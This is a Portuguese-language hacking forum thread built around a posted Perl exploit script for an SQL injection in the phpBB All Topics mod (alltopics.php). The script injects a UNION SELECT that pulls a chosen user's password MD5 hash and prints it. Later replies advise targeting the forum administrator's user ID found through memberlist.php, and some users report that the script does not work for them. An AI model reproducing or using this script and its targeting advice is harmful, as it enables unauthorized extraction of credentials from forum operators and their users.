Title: phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Post by: insanity on 23 de August , 2006, 03:11:59 PM
Post by: insanity on 23 de August , 2006, 03:11:59 PM
Code Select
#!/usr/bin/perl
print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod: http://www.phpbbhacks.com/download/2821 +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
# milw0rm.com [2006-08-23]
Title: Re: phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Post by: Anonymous on 23 de August , 2006, 05:00:58 PM
Post by: Anonymous on 23 de August , 2006, 05:00:58 PM
Heys! vc me pode dizer como se ve o nosso numero do ID nos forums phpBB? me disseram que eh atraves da DB, mas se queremos explorar a falha supostamente nem acessoa DB temos... aparece o seguinte na consola...
crypthief@cryptbox:~/Desktop$ perl phpbb.pl
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod: http://www.phpbbhacks.com/download/2821 (http://www.phpbbhacks.com/download/2821 ) +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
=> Insert URL
=> without ( http )
=> endereco.com
=> Insert directory
=> es: /forum/ - /phpBB2/
=> /forum/
=> User ID
=> Number:
=>
Abraços,
crypthief@cryptbox:~/Desktop$ perl phpbb.pl
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod: http://www.phpbbhacks.com/download/2821 (http://www.phpbbhacks.com/download/2821 ) +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
=> Insert URL
=> without ( http )
=> endereco.com
=> Insert directory
=> es: /forum/ - /phpBB2/
=> /forum/
=> User ID
=> Number:
=>
Abraços,
Title: Re: phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Post by: _Dr4k0_ on 23 de August , 2006, 06:01:24 PM
Post by: _Dr4k0_ on 23 de August , 2006, 06:01:24 PM
Quote from: "crypthief"Heys! vc me pode dizer como se ve o nosso numero do ID nos forums phpBB? me disseram que eh atraves da DB, mas se queremos explorar a falha supostamente nem acessoa DB temos... aparece o seguinte na consola...
crypthief@cryptbox:~/Desktop$ perl phpbb.pl
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod: http://www.phpbbhacks.com/download/2821 (http://www.phpbbhacks.com/download/2821 ) +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
=> Insert URL
=> without ( http )
=> endereco.com
=> Insert directory
=> es: /forum/ - /phpBB2/
=> /forum/
=> User ID
=> Number:
=>
Abraços,
Para se ver o id de uma pessoa em fóruns phppbb deixe o mouse em cima do "nick" e que lá em baixo no seu browser irá aparecer...
Title: Re: phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Post by: insanity on 23 de August , 2006, 06:04:00 PM
Post by: insanity on 23 de August , 2006, 06:04:00 PM
Procure pelo adiministrador do forum em /memberlist.php?
e olhe o ID dele.
que provavelmente deve ser o primeiro
ate mais
e olhe o ID dele.
que provavelmente deve ser o primeiro
ate mais
Title: Re: phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Post by: Anonymous on 02 de September , 2006, 02:23:21 AM
Post by: Anonymous on 02 de September , 2006, 02:23:21 AM
Po....alguem me esplica como q usa esse sploit ai !!!
eu fiz tudo...entrei no perl\bin
digitei o nome do esploit...e deu tudo certinho....ai no final fala exploit finished...mais ai num aconteceu nada !!!!
o q eu fasso depois disso
?
help aii !!!
eu fiz tudo...entrei no perl\bin
digitei o nome do esploit...e deu tudo certinho....ai no final fala exploit finished...mais ai num aconteceu nada !!!!
o q eu fasso depois disso
?help aii !!!
Title: Re: phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Post by: DarkGenesis on 04 de September , 2006, 01:10:17 PM
Post by: DarkGenesis on 04 de September , 2006, 01:10:17 PM
Ele funciona em forums PhpBB que tem instalado o Mod All Topics (//http://www.phpbbhacks.com/download/2821)
Title: Re: phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Post by: Security on 19 de September , 2006, 12:44:37 AM
Post by: Security on 19 de September , 2006, 12:44:37 AM
sempre dá
exploit finished :S
num funfa não u.u
exploit finished :S
num funfa não u.u